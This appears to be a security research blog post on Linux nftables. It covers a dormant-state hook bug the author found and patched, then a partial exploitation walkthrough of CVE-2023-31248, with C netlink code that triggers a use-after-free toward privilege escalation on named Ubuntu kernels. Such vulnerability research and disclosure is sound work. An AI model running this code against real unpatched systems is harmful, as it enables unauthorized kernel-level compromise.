During my internship, I have been researching and trying to find bugs within the nftables subsystem. In this blog post, I will talk about a bug I have found, as well as the exploitation of an n-day discovered by Mingi Cho – CVE-2023-31248.

Introduction to nftables

nftables is a modern packet filtering framework that aims to replace the legacy {ip,ip6,arp,eb}_tables (xtables) infrastructure. It reuses the existing netfilter hooks, which act as entry points for handlers that perform various operations on packets. Nftables table objects contain a list of chain objects, which contain a list of rule objects, which finally contain expressions, which perform the operations of the pseudo-state machine.


Tables are top-level objects which contain chains, sets, objects and flowtables. Internally, tables are represented by struct nft_table.

 *	struct nft_table - nf_tables table
 *	@list: used internally
 *	@chains_ht: chains in the table
 *	@chains: same, for stable walks
 *	@sets: sets in the table
 *	@objects: stateful objects in the table
 *	@flowtables: flow tables in the table
 *	@hgenerator: handle generator state
 *	@handle: table handle
 *	@use: number of chain references to this table
 *	@flags: table flag (see enum nft_table_flags)
 *	@genmask: generation mask
 *	@afinfo: address family info
 *	@name: name of the table
 *	@validate_state: internal, set when transaction adds jumps
struct nft_table {
	struct list_head		list;
	struct rhltable			chains_ht;
	struct list_head		chains;
	struct list_head		sets;
	struct list_head		objects;
	struct list_head		flowtables;
	u64				hgenerator;
	u64				handle;
	u32				use;
	u16				family:6,
	u32				nlpid;
	char		    *name;
	u16				udlen;
	u8				*udata;
	u8				validate_state;

A table can have multiple different flags. The user is able to set the flags NFT_TABLE_F_DORMANT and/or NFT_TABLE_F_OWNER when the table is created (nf_tables_newtable). The dormant state flag (NFT_TABLE_F_DORMANT) can be updated in nf_tables_updtable. If NFT_TABLE_F_DORMANT (0x1) is set, the table will be made dormant, and all its basechain hooks will be unregistered, but the table will not be deleted. There are also internally set __NFT_TABLE_F_UPDATE flags, which comprise of __NFT_TABLE_F_WAS_AWAKEN and __NFT_TABLE_F_WAS_DORMANT.


Chains can either be base chains, which are registered with a netfilter hook and cannot be jumped to, or normal chains, which are not registered with a hook but can be jumped to. Internally, chains are represented by struct nft_chain.

 *	struct nft_chain - nf_tables chain
 *	@rules: list of rules in the chain
 *	@list: used internally
 *	@rhlhead: used internally
 *	@table: table that this chain belongs to
 *	@handle: chain handle
 *	@use: number of jump references to this chain
 *	@flags: bitmask of enum nft_chain_flags
 *	@name: name of the chain
struct nft_chain {
	struct nft_rule_blob		__rcu *blob_gen_0;
	struct nft_rule_blob		__rcu *blob_gen_1;
	struct list_head		rules;
	struct list_head		list;
	struct rhlist_head		rhlhead;
	struct nft_table		*table;
	u64				handle;
	u32				use;
	u8				flags:5,
	char			*name;
	u16				udlen;
	u8				*udata;

	/* Only used during control plane commit phase: */
	struct nft_rule_blob		*blob_next;

Basechains are represented by struct nft_base_chain.

 *	struct nft_base_chain - nf_tables base chain
 *	@ops: netfilter hook ops
 *	@hook_list: list of netfilter hooks (for NFPROTO_NETDEV family)
 *	@type: chain type
 *	@policy: default policy
 *	@stats: per-cpu chain stats
 *	@chain: the chain
 *	@flow_block: flow block (for hardware offload)
struct nft_base_chain {
	struct nf_hook_ops		ops;
	struct list_head		hook_list;
	const struct nft_chain_type	*type;
	u8				policy;
	u8				flags;
	struct nft_stats __percpu	*stats;
	struct nft_chain		chain;
	struct flow_block		flow_block;


Rules contain nftables expressions. Internally, rules are represented by struct nft_rule.

 *	struct nft_rule - nf_tables rule
 *	@list: used internally
 *	@handle: rule handle
 *	@genmask: generation mask
 *	@dlen: length of expression data
 *	@udata: user data is appended to the rule
 *	@data: expression data
struct nft_rule {
	struct list_head		list;
	u64				handle:42,
	unsigned char			data[]
		__attribute__((aligned(__alignof__(struct nft_expr))));


Expressions act as the operations of the state machine. There are many expressions, here are some for example:

  • Bitwise: Performs bitwise operations
  • Immediate: To load data into registers. Also allows for jumps/goto to another normal chain
  • Byteorder: To change from host/network endianness
  • Compare: To compare values in two registers
  • Counter: To enable counters in rules

Interally, expressions are represented by struct nft_expr.

 *	struct nft_expr - nf_tables expression
 *	@ops: expression ops
 *	@data: expression private data
struct nft_expr {
	const struct nft_expr_ops	*ops;
	unsigned char			data[]

Each expression also has a struct nft_expr_ops representing various operations.

 *	struct nft_expr_ops - nf_tables expression operations
 *	@eval: Expression evaluation function
 *	@size: full expression size, including private data size
 *	@init: initialization function
 *	@activate: activate expression in the next generation
 *	@deactivate: deactivate expression in next generation
 *	@destroy: destruction function, called after synchronize_rcu
 *	@dump: function to dump parameters
 *	@type: expression type
 *	@validate: validate expression, called during loop detection
 *	@data: extra data to attach to this expression operation
 struct nft_expr_ops {
	void			(*eval)(const struct nft_expr *expr,
						struct nft_regs *regs,
						const struct nft_pktinfo *pkt);
	int				(*clone)(struct nft_expr *dst,
						const struct nft_expr *src);
	unsigned int	size;
	int				(*init)(const struct nft_ctx *ctx,
						const struct nft_expr *expr,
						const struct nlattr * const tb[]);
	void			(*activate)(const struct nft_ctx *ctx,
						const struct nft_expr *expr);
	void			(*deactivate)(const struct nft_ctx *ctx,
						const struct nft_expr *expr,
						enum nft_trans_phase phase);
	void			(*destroy)(const struct nft_ctx *ctx,
						const struct nft_expr *expr);
	void			(*destroy_clone)(const struct nft_ctx *ctx,
						const struct nft_expr *expr);
	int				(*dump)(struct sk_buff *skb,
						const struct nft_expr *expr,
						bool reset);
	int				(*validate)(const struct nft_ctx *ctx,
						const struct nft_expr *expr,
						const struct nft_data **data);
	bool			(*reduce)(struct nft_regs_track *track,
					    const struct nft_expr *expr);
	bool			(*gc)(struct net *net,
					    const struct nft_expr *expr);
	int				(*offload)(struct nft_offload_ctx *ctx,
						struct nft_flow_rule *flow,
						const struct nft_expr *expr);
	bool			(*offload_action)(const struct nft_expr *expr);
	void			(*offload_stats)(struct nft_expr *expr,
						const struct flow_stats *stats);
	const struct nft_expr_type	*type;
	void				        *data;

Genmask System

Many nftables objects have a 2 bit genmask, which specifies whether an object is active in the current and/or next generation. If a bit is set, the object is not active in that generation. There is an overall gencursor defining the bit that represents the current generation. Objects can have the following states:

  • Active in both the current and next generation (e.g. unchanged objects)
  • Active in the current generation, inactive in the next generation (e.g. objects marked for deletion)
  • Inactive in the current generation, active in the next generation (e.g. newly created objects)

Control Plane, Transaction System and Transaction Worker

In nftables, actions requested by userspace (via a netlink message) are performed in the control plane, which include functions such as nf_tables_newtable, nf_tables_updtable, nf_tables_newchain and more. The control plane is in charge of the creation and allocation of objects, activating/deactivating objects in the next generation, linking objects, and modifying the “use” refcount of objects. However, newly created objects are not immediately activated after creation; they are only activated in the commit phase when a new generation is started. All actions in the control plane that involve the creation or updating of objects will add a new transaction to the transaction list.

When a netlink batch transaction is considered to be valid (i.e. all actions in the control plane do not return errors), the commit phase is entered and nf_tables_commit is called. A new generation will be started, resulting in all newly created objects becoming active, and actions in the transaction list will be performed. The commit phase is also in charge of unlinking objects that are to be deleted, and queuing the asynchronous transaction worker in charge of destroying objects (nf_tables_trans_destroy_work).

The asynchronous transaction worker, when run, will call nft_commit_release, which will finally call functions that will destroy and free objects marked for deletion.

nftables Dormant State Chain Hook Deactivation Bug

While researching nftables, through manual source code review, I was able to identify a bug that resulted in a warning splat. The bug report can be seen here: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/net/netfilter/nf_tables_api.c?id=c9bd26513b3a11b3adb3c2ed8a31a01a87173ff1

When a newly created table table is updated via nf_tables_updtable from active to dormant, the table flag is set to NFT_TABLE_F_DORMANT, and as none of the __NFT_TABLE_F_UPDATE flags are set, the __NFT_TABLE_F_WAS_AWAKEN flag will be set. When updating a table from active to dormant, the chain hooks are not deactivated until nf_tables_commit is called. However, when a table is updated from dormant to active, the NFT_TABLE_F_DORMANT flag is unset. It then checks if any of the __NFT_TABLE_F_UPDATE flags are set, and if none are set, the chain hooks are instantly activated by nf_tables_table_enable (i.e. before nf_tables_commit is called). This code behaviour can be seen below:

static int nf_tables_updtable(struct nft_ctx *ctx) {
		if ((flags & NFT_TABLE_F_DORMANT) &&
	    !(ctx->table->flags & NFT_TABLE_F_DORMANT)) {
		ctx->table->flags |= NFT_TABLE_F_DORMANT;
		if (!(ctx->table->flags & __NFT_TABLE_F_UPDATE))
			ctx->table->flags |= __NFT_TABLE_F_WAS_AWAKEN;
	} else if (!(flags & NFT_TABLE_F_DORMANT) &&
		   ctx->table->flags & NFT_TABLE_F_DORMANT) {
		ctx->table->flags &= ~NFT_TABLE_F_DORMANT;
		if (!(ctx->table->flags & __NFT_TABLE_F_UPDATE)) {
			ret = nf_tables_table_enable(ctx->net, ctx->table);
			if (ret < 0)
				goto err_register_hooks;

			ctx->table->flags |= __NFT_TABLE_F_WAS_DORMANT;

It is possible to activate/deactivate tables in a way such that at one point of time, some chains are registered and some are not registered. This can be done by updating an active table to dormant so that the __NFT_TABLE_F_WAS_AWAKEN flag, which is one of the __NFT_TABLE_F_UPDATE flags are set, and then updating the dormant table to active. As one of the __NFT_TABLE_F_UPDATE flags are set, nf_tables_table_enable is skipped, leaving some chains unregistered. When an active table is deleted, nf_tables_unregister_hook only checks if the NFT_TABLE_F_DORMANT flag is zeroed out. If the flag is unset, all the base chains are assumed to be active and hence all the chain hooks will be deactivated, even if they are not registered in the first place. This causes the following warning to be displayed:

[ 1411.118307] ------------[ cut here ]------------
[ 1411.119665] hook not found, pf 2 num 3
[ 1411.119708] WARNING: CPU: 1 PID: 367 at net/netfilter/core.c:517 __nf_unregister_net_hook+0xf8/0x2e0
[ 1411.124338] Modules linked in:
[ 1411.125549] CPU: 1 PID: 367 Comm: nft Not tainted 6.5.2 #2
[ 1411.127933] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.2-debian-1.16.2-1 04/01/2014
[ 1411.130939] RIP: 0010:__nf_unregister_net_hook+0xf8/0x2e0
[ 1411.133576] Code: 01 00 0f 85 90 00 00 00 48 8b 3c 24 c6 05 a5 77 dd 01 01 e8 3a 49 fc fe 8b 53 1c 44 89 e6 48 c7 c7 e0 59 31 83 e8 c8 4c c1 fe <0f> 0b eb 6a 44 89 f8 48 c1 e0 04 4c 01 f0 48 8d 78 08 48 89 44 24
[ 1411.143107] RSP: 0018:ffff8880158f7388 EFLAGS: 00010282
[ 1411.145200] RAX: 0000000000000000 RBX: ffff888006c0f200 RCX: 0000000000000000
[ 1411.147892] RDX: 0000000000000002 RSI: ffffffff8114726f RDI: ffffffff85bd0200
[ 1411.150749] RBP: ffffffff85ffdac0 R08: 0000000000000001 R09: ffffed100da64f01
[ 1411.153231] R10: ffff88806d32780b R11: 0000000000000001 R12: 0000000000000002
[ 1411.156197] R13: ffff888007a4cab8 R14: ffff888007a4ca80 R15: 0000000000000002
[ 1411.159507] FS:  00007f03b7cd5d80(0000) GS:ffff88806d300000(0000) knlGS:0000000000000000
[ 1411.162667] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 1411.164773] CR2: 00007ffc14b40558 CR3: 0000000017ce8000 CR4: 00000000000006e0
[ 1411.169262] Call Trace:
[ 1411.171044]  <TASK>
[ 1411.172713]  ? __warn+0x9c/0x200
[ 1411.174282]  ? __nf_unregister_net_hook+0xf8/0x2e0
[ 1411.176416]  ? report_bug+0x1f2/0x220
[ 1411.177947]  ? handle_bug+0x3c/0x80
[ 1411.179123]  ? exc_invalid_op+0x13/0x40
[ 1411.180361]  ? asm_exc_invalid_op+0x16/0x20
[ 1411.181887]  ? preempt_count_sub+0xf/0xc0
[ 1411.183772]  ? __nf_unregister_net_hook+0xf8/0x2e0
[ 1411.185357]  ? __nf_unregister_net_hook+0xf8/0x2e0
[ 1411.187045]  nf_tables_commit+0x1a15/0x2600
[ 1411.189373]  ? __pfx___nla_validate_parse+0x20/0x20
[ 1411.191535]  ? __pfx_lock_release+0x20/0x20
[ 1411.193486]  ? __pfx_nf_tables_commit+0x20/0x20
[ 1411.195470]  nfnetlink_rcv_batch+0x860/0x1100
[ 1411.197345]  ? __pfx_nfnetlink_rcv_batch+0x20/0x20
[ 1411.199436]  ? find_held_lock+0x83/0xa0
[ 1411.200948]  nfnetlink_rcv+0x1da/0x220
[ 1411.202570]  ? __pfx_nfnetlink_rcv+0x20/0x20
[ 1411.204341]  ? netlink_deliver_tap+0xf7/0x5e0
[ 1411.206507]  netlink_unicast+0x2ca/0x460
[ 1411.208166]  ? __pfx_netlink_unicast+0x20/0x20
[ 1411.210278]  ? __virt_addr_valid+0xd4/0x160
[ 1411.212405]  netlink_sendmsg+0x3d5/0x700
[ 1411.214076]  ? __pfx_netlink_sendmsg+0x20/0x20
[ 1411.215943]  ? import_ubuf+0xc1/0x100
[ 1411.217517]  ? __pfx_netlink_sendmsg+0x20/0x20
[ 1411.219358]  sock_sendmsg+0xda/0xe0
[ 1411.220915]  ? import_iovec+0x54/0x80
[ 1411.222655]  ____sys_sendmsg+0x436/0x500
[ 1411.224223]  ? __pfx_____sys_sendmsg+0x20/0x20
[ 1411.226046]  ? __pfx_copy_msghdr_from_user+0x20/0x20
[ 1411.227928]  ? sk_getsockopt+0xbc7/0x1b20
[ 1411.229274]  ? find_held_lock+0x83/0xa0
[ 1411.230507]  ___sys_sendmsg+0xf8/0x160
[ 1411.231712]  ? __pfx____sys_sendmsg+0x20/0x20
[ 1411.233656]  ? __pfx_sk_setsockopt+0x20/0x20
[ 1411.235285]  ? sock_has_perm+0xc9/0x1a0
[ 1411.236601]  ? __fget_light+0xda/0x100
[ 1411.238418]  __sys_sendmsg+0xe5/0x180
[ 1411.240445]  ? __pfx___sys_sendmsg+0x20/0x20
[ 1411.241861]  ? __sys_getsockopt+0x17d/0x1a0
[ 1411.243273]  ? syscall_enter_from_user_mode+0x1c/0x60
[ 1411.244890]  do_syscall_64+0x3a/0xa0
[ 1411.246060]  entry_SYSCALL_64_after_hwframe+0x6e/0xd8

This bug was introduced in the following commit: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/net/netfilter/nf_tables_api.c?id=179d9ba5559a756f4322583388b3213fe4e391b0

Triggering the Bug

To trigger the bug, the following steps should be taken (in the same batch transaction):

  1. Create a table “test_table” – this table is active [1]
  2. Update the table “test_table” from active to dormant [2] a. The NFT_TABLE_F_DORMANT and __NFT_TABLE_F_WAS_AWAKEN table flags are set
  3. Add a basechain “chain1” – this basechain is added to a dormant table and hence is not registered [3]
  4. Update the table “test_table” from dormant to active [4] a. The NFT_TABLE_F_DORMANT flag is zeroed out, but the __NFT_TABLE_F_WAS_AWAKEN flag is still set, causing nf_tables_enable_table to be skipped
  5. Delete the active table “test_table” using the nft utility: nft delete table test_table [5]

The table is active when it was deleted, so when the table is being flushed, all the basechains are treated as registered and will be unregistered. However, as basechain “chain1” was never registered, the kernel will try to unregister an unregistered chain, causing a warning.

#define _GNU_SOURCE
#include <stdio.h> 
#include <stdlib.h>
#include <string.h>
#include <signal.h>
#include <stddef.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/socket.h>
#include <errno.h>
#include <fcntl.h>
#include <sys/mman.h>
#include <time.h>

#include <linux/netfilter.h>
#include <linux/netfilter/nfnetlink.h>
#include <linux/netfilter/nf_tables.h>

#include <libmnl/libmnl.h>
#include <libnftnl/table.h>
#include <libnftnl/chain.h>

struct unft_base_chain_param {
    uint32_t hook_num;
    uint32_t prio;

struct nftnl_table* build_table(char* name, uint16_t family) {
    struct nftnl_table* t = nftnl_table_alloc();
    nftnl_table_set_u32(t, NFTNL_TABLE_FAMILY, family);
    nftnl_table_set_str(t, NFTNL_TABLE_NAME, name);
    return t;

struct nftnl_chain* build_chain(char* table_name, char* chain_name, struct unft_base_chain_param* base_param, uint32_t chain_id) {
    struct nftnl_chain* c;
    c = nftnl_chain_alloc();
    nftnl_chain_set_str(c, NFTNL_CHAIN_NAME, chain_name);
    nftnl_chain_set_str(c, NFTNL_CHAIN_TABLE, table_name);
    if (base_param) {
        nftnl_chain_set_u32(c, NFTNL_CHAIN_HOOKNUM, base_param->hook_num);
        nftnl_chain_set_u32(c, NFTNL_CHAIN_PRIO, base_param->prio);
    if (chain_id) {
        nftnl_chain_set_u32(c, NFTNL_CHAIN_ID, chain_id);
    return c;

int main(void) {
    struct nlmsghdr *nlh;
    struct mnl_nlmsg_batch *batch;
    int ret;
    int seq = time(NULL);
    uint8_t family = NFPROTO_IPV4;

    struct mnl_socket* nl = mnl_socket_open(NETLINK_NETFILTER);
    if (nl == NULL) {
	if (mnl_socket_bind(nl, 0, MNL_SOCKET_AUTOPID) < 0) {

    // Start nl message
	batch = mnl_nlmsg_batch_start(buf, sizeof(buf));
	nftnl_batch_begin(mnl_nlmsg_batch_current(batch), seq++);
    // Create active table "test_table" [1]
    struct nftnl_table * t = build_table("test_table", NFPROTO_IPV4);
    nlh = nftnl_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), NFT_MSG_NEWTABLE, family, NLM_F_CREATE | NLM_F_ACK, seq++);
    nftnl_table_nlmsg_build_payload(nlh, t);
	// Update table "test_table" -- table is now dormant [2]
	nlh = nftnl_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), NFT_MSG_NEWTABLE, family, NLM_F_CREATE | NLM_F_ACK, seq++);
    nftnl_table_set_u32(t, NFTNL_TABLE_FLAGS, 0x1);
    nftnl_table_nlmsg_build_payload(nlh, t);
    // Add basechain "chain1" -- not registered [3]
    struct unft_base_chain_param bp2;
    bp2.hook_num = NF_INET_LOCAL_OUT;
    bp2.prio = 11;
    struct nftnl_chain * c = build_chain("test_table", "chain1", &bp2, 11);
    nlh = nftnl_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), NFT_MSG_NEWCHAIN, family, NLM_F_CREATE | NLM_F_ACK, seq++);
    nftnl_chain_nlmsg_build_payload(nlh, c);
	// Update table "test_table" -- table is now active [4]
	nlh = nftnl_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), NFT_MSG_NEWTABLE, family, NLM_F_CREATE | NLM_F_ACK, seq++);
    nftnl_table_set_u32(t, NFTNL_TABLE_FLAGS, 0x0);
    nftnl_table_nlmsg_build_payload(nlh, t);
    nftnl_batch_end(mnl_nlmsg_batch_current(batch), seq++);
    // Send netlink message
    printf("[+] Sending netlink message 1\n");
	ret = mnl_socket_sendto(nl, mnl_nlmsg_batch_head(batch), mnl_nlmsg_batch_size(batch));
    // Trigger warning [5]
    system("nft delete table test_table");

    return 0;

Unfortunately (actually fortunately), the bug is unexploitable as we are unable to reach any interesting frees. For filter/route hooks, nf_remove_net_hook will fail and result in the warning, and for NAT hooks, nat_proto_net->users == 0, resulting in another warning, preventing us from reaching the free.

Patch Analysis

To patch the bug, the developers decided that it was best to prevent toggling the dormant state more than once in a single batch transaction. I guess the tables were not meant to be updated…periodically ;)

diff --git a/net/netfilter/nf_tables_api.c b/net/netfilter/nf_tables_api.c
index d819b4d429624..a3680638ec60f 100644
--- a/net/netfilter/nf_tables_api.c
+++ b/net/netfilter/nf_tables_api.c
@@ -1219,6 +1219,10 @@ static int nf_tables_updtable(struct nft_ctx *ctx)
 	     flags & NFT_TABLE_F_OWNER))
 		return -EOPNOTSUPP;
+	/* No dormant off/on/off/on games in single transaction */
+	if (ctx->table->flags & __NFT_TABLE_F_UPDATE)
+		return -EINVAL;
 	trans = nft_trans_alloc(ctx, NFT_MSG_NEWTABLE,
 				sizeof(struct nft_trans_table));
 	if (trans == NULL)

If the update flag was previously set (by toggling the dormant state previously in the same batch transaction), nf_tables_updtable will simply fail.


Other than trying to find new bugs, I also conducted n-day research on CVE-2023-31248, which was discovered by Mingi Cho. The bug report and patch can be found here: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=515ad530795c118f012539ed76d02bacfd426d89

Linux kernel versions before 6.2.0-26 generic are vulnerable to this bug. The exploit has been tested on Ubuntu 23.04 (Lunar Lobster), with kernel version 6.2.0-20 generic.

Vulnerability Analysis

nft_chain_lookup_byid does not check whether a chain is active (by checking the genmask) when looking up a chain, as seen in the code below:

static struct nft_chain *nft_chain_lookup_byid(const struct net *net,
					       const struct nft_table *table,
					       const struct nlattr *nla)
	struct nftables_pernet *nft_net = nft_pernet(net);
	u32 id = ntohl(nla_get_be32(nla));
	struct nft_trans *trans;

	list_for_each_entry(trans, &nft_net->commit_list, list) {
		struct nft_chain *chain = trans->ctx.chain;

		if (trans->msg_type == NFT_MSG_NEWCHAIN &&
		    chain->table == table &&
		    id == nft_trans_chain_id(trans))
			return chain;
	return ERR_PTR(-ENOENT);

When adding a rule to a chain referring to its ID, if that chain had been deleted on the same batch, it is possible to refer to an inactive chain. Rule addition will fail immediately afterwards due to the value of chain->use not being 0, resulting in a warning being displayed.

Triggering the bug with a single batch transaction

To trigger the bug, a batch transaction can be sent comprising of the following steps:

  1. Create a new table “table1” (NFT_MSG_NEWTABLE)
  2. Create a new chain “chain1” (NFT_MSG_NEWCHAIN)
  3. Delete “chain1” (NFT_MSG_DELCHAIN)
  4. Create a new chain “chain2” (NFT_MSG_NEWCHAIN)
  5. Create a rule inside chain2 referencing chain1. This can be done with a jump or goto expression with the destination chain set to chain1’s chain ID. (NFT_MSG_NEWRULE)

When the new rule is created, the following code path is taken such that the value of chain->use for the destination chain (chain1) is incremented from 0 to 1. This is due to the fact that a new reference to chain1 is created.

    -> nf_tables_newexpr 
        -> nft_immediate_init 
            -> nft_data_init 
                -> nft_verdict_init 

As all the actions in the batch transaction are determined to be valid, the batch transaction succeeds. When a valid batch transaction succeeds, nfnetlink_rcv_batch calls the commit operation for nf_tables_subsys, which is nf_tables_commit.

Note that the struct nft_chain chain1 object is not immediately deleted when NFT_MSG_DELCHAIN is received. For each action, a transaction is added to the list, and all the transactions are processed when commit is called. Destruction of deleted objects is then scheduled, and performed by a worker thread asynchronously. The following code path is then taken to destroy and free the chain1 object, which has been marked as inactive:

    -> nf_tables_commit_release
        -> nf_tables_trans_destroy_work 
            -> nft_commit_release
                -> nf_tables_chain_destroy

However, in this case, when nf_tables_chain_destroy is reached, chain1 is not freed and a warning is displayed. This is because chain1’s chain->use is 1 and not 0 ([6]).

void nf_tables_chain_destroy(struct nft_ctx *ctx)
	struct nft_chain *chain = ctx->chain;
	struct nft_hook *hook, *next;

	if (WARN_ON(chain->use > 0))                                     <-- [6]

	/* no concurrent access possible anymore */

	if (nft_is_base_chain(chain)) {
		struct nft_base_chain *basechain = nft_base_chain(chain);

		if (nft_base_chain_netdev(ctx->family, basechain->ops.hooknum)) {
			list_for_each_entry_safe(hook, next,
						 &basechain->hook_list, list) {
				kfree_rcu(hook, rcu);
		if (rcu_access_pointer(basechain->stats)) {
	} else {


Obtaining a Use-After-Free

The first step to writing a successful privilege escalation exploit is obtaining a use-after-free primitive. Essentially, we need to find a way to decrease chain->use of the deleted chain to 0 so that when nf_tables_chain_destroy is called, the chain object is freed. This can be done via exploiting the race condition between the control plane (nf_tables_delrule) and the transaction worker (nf_tables_trans_destroy_work).

In order to do this, 2 batch transactions were sent. In the first batch transaction, the following actions were performed:

  1. Create a new table “test_table” (NFT_MSG_NEWTABLE)
  2. Create a new chain “chain1” with name “AAAAAAAAAAAAAAAAAAAA” (NFT_MSG_NEWCHAIN). The name of the chain is 20 characters long. This is the chain to be deleted.
  3. Delete chain 1 (NFT_MSG_DELCHAIN)
  4. Create a new chain “chain2” (NFT_MSG_NEWCHAIN)
  5. Create a rule inside “chain2” referencing chain 1 with name “AAAAAAAAAAAAAAAAAAAA”. In the exploit, this was done with an immediate “goto” expression with the destination chain set to the target chain using the chain ID.
    // Start nl message 1
	batch = mnl_nlmsg_batch_start(buf, sizeof(buf));
	nftnl_batch_begin(mnl_nlmsg_batch_current(batch), seq++);
    // Create table 
    struct nftnl_table *t = build_table(table_name, NFPROTO_IPV4);
    family = nftnl_table_get_u32(t, NFTNL_TABLE_FAMILY);
    nlh = nftnl_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), NFT_MSG_NEWTABLE, family, NLM_F_CREATE | NLM_F_ACK, seq++);
    nftnl_table_nlmsg_build_payload(nlh, t);
    // Create chain 1
    struct nftnl_chain *c = build_chain(table_name, chain_name, NULL, 0x1234);
    nlh = nftnl_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), NFT_MSG_NEWCHAIN, family, NLM_F_CREATE | NLM_F_ACK, seq++);
    nftnl_chain_nlmsg_build_payload(nlh, c);
    // Delete chain 1
    nlh = nftnl_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), NFT_MSG_DELCHAIN, family, NLM_F_CREATE | NLM_F_ACK, seq++);
    nftnl_chain_nlmsg_build_payload(nlh, c);
    // Create chain 2
    struct nftnl_chain *c2 = build_chain(table_name, "chain2", &bp, 10);
    nlh = nftnl_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), NFT_MSG_NEWCHAIN, family, NLM_F_CREATE | NLM_F_ACK, seq++);
    nftnl_chain_nlmsg_build_payload(nlh, c2);
    // Create rule pointing to chain 1
    struct nftnl_rule *r = build_rule(table_name, "chain2", family, NULL);
    nlh = nftnl_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), NFT_MSG_NEWRULE, family, NLM_F_CREATE | NLM_F_ACK, seq++); 
    // Add immediate expr to rule
    struct nftnl_expr *e = nftnl_expr_alloc("immediate");
    nftnl_expr_set_u32(e, NFTNL_EXPR_IMM_DREG, NFT_REG_VERDICT);
    nftnl_expr_set_u32(e, NFTNL_EXPR_IMM_VERDICT, NFT_GOTO);
    nftnl_expr_set_u32(e, NFTNL_EXPR_IMM_CHAIN_ID, 0x1234);
    nftnl_rule_add_expr(r, e); 
    nftnl_rule_nlmsg_build_payload(nlh, r);

    nftnl_batch_end(mnl_nlmsg_batch_current(batch), seq++);
    // Send netlink message
    printf("[+] Sending netlink message 1\n");
	ret = mnl_socket_sendto(nl, mnl_nlmsg_batch_head(batch),
	if (ret == -1) {

As all the actions in the first batch transaction are valid, commit is called, and the transaction worker which destroys inactive objects is scheduled.

The second batch transaction consists of the following operations:

  1. Delete the rule referencing the target chain (NFT_MSG_DELRULE)
  2. Create an invalid rule. In this case, audit_info->type can take values ranging from 0 to 2 inclusive, so 0xff is an invalid value which will cause the batch to fail. [7]
    // Start nl message 2
    batch = mnl_nlmsg_batch_start(buf, sizeof(buf));
    nftnl_batch_begin(mnl_nlmsg_batch_current(batch), seq++);
    // Delete rule 1 
    nlh = nftnl_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), NFT_MSG_DELRULE, family, NLM_F_CREATE | NLM_F_ACK, seq++);
    nftnl_rule_nlmsg_build_payload(nlh, r);
    // Fail the batch using a invalid rule
    struct nftnl_rule *r2 = nftnl_rule_alloc();
    nftnl_rule_set_u32(r2, NFTNL_RULE_FAMILY, NFPROTO_IPV4);
    nftnl_rule_set_str(r2, NFTNL_RULE_TABLE, table_name);
    nftnl_rule_set_str(r2, NFTNL_RULE_CHAIN, "chain2");

    struct xt_audit_info *audit_info;
    audit_info = malloc(sizeof(struct xt_audit_info));
    audit_info->type = 0xff;                                         <-- [7]
    struct nftnl_expr *e2 = nftnl_expr_alloc("target");
    nftnl_expr_set_str(e2, NFTNL_EXPR_TG_NAME, "AUDIT");
    nftnl_expr_set_u32(e2, NFTNL_EXPR_TG_REV, 0);
    nftnl_expr_set_data(e2, NFTNL_EXPR_TG_INFO, audit_info, sizeof(struct xt_audit_info));
    nftnl_rule_add_expr(r2, e2);
    nlh = nftnl_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), NFT_MSG_NEWRULE, family, NLM_F_CREATE | NLM_F_ACK, seq++);
    nftnl_rule_nlmsg_build_payload(nlh, r2);
    nftnl_batch_end(mnl_nlmsg_batch_current(batch), seq++);
    // Send netlink message 2
    printf("[+] Sending netlink message 2\n");
    ret = mnl_socket_sendto(nl, mnl_nlmsg_batch_head(batch),
    if (ret == -1) {

As the second batch transaction fails, commit will not be called. However, nftables netlink messages were still passed to nftables, and operations in the control plane will still be performed (they will be aborted at the very end when the batch transaction fails).

As NFT_MSG_DELRULE was passed to nftables, the following code path is taken:

    -> nft_delrule_by_chain
        -> nft_delrule
            -> nft_rule_expr_deactivate
                -> nft_immediate_deactivate
                    -> nft_data_release
                        -> nft_verdict_uninit

Specifically, in nft_verdict_uninit, chain->use of the referenced chain (which in this case would be our target chain “AAAAAAAAAAAAAAAAAAAA”) will be decremented from 1 to 0.

static void nft_verdict_uninit(const struct nft_data *data)
	struct nft_chain *chain;
	struct nft_rule *rule;

	switch (data->verdict.code) {
	case NFT_JUMP:
	case NFT_GOTO:
		chain = data->verdict.chain;

Essentially, chain->use of the target chain must be decremented to 0 before the transaction worker nf_tables_trans_destroy_work runs, and the transaction worker must run before the failed batch transaction is aborted.

If the rule is marked for deletion before nf_tables_chain_destroy is called, chain->use of the target chain will be 0 when the chain is destroyed, allowing the chain to be freed. As seen in the function code previously, the chain is freed in the order chain->name, chain->udata, and chain. The struct nft_chain object has been freed, but we still have a reference to the freed chain via the rule (which is not actually deleted because the second transaction fails), resulting in a use-after-free. The space where chain, chain->name and chain->udata originally was can now be reclaimed with another object to aid us in our exploitation.

Obtaining a kernel text leak

Before going into how to obtain a leak, it is important to understand how and where the chain, chain->udata and chain->name objects are allocated.

The struct nft_chain object is allocated when nftables receives a NFT_MSG_NEWCHAIN message. In the control plane, nf_tables_newchain calls nf_tables_addchain, which allocates the new chain object in the kmalloc-cg-128 cache. chain->udata and chain->name are allocated in their respective kmalloc-cg caches by nla_memdup and nla_strdup respectively.

static int nf_tables_addchain(struct nft_ctx *ctx, u8 family, u8 genmask,
			      u8 policy, u32 flags,
			      struct netlink_ext_ack *extack)
		chain = kzalloc(sizeof(*chain), GFP_KERNEL_ACCOUNT);
		if (chain == NULL)
			return -ENOMEM;
	if (nla[NFTA_CHAIN_NAME]) {
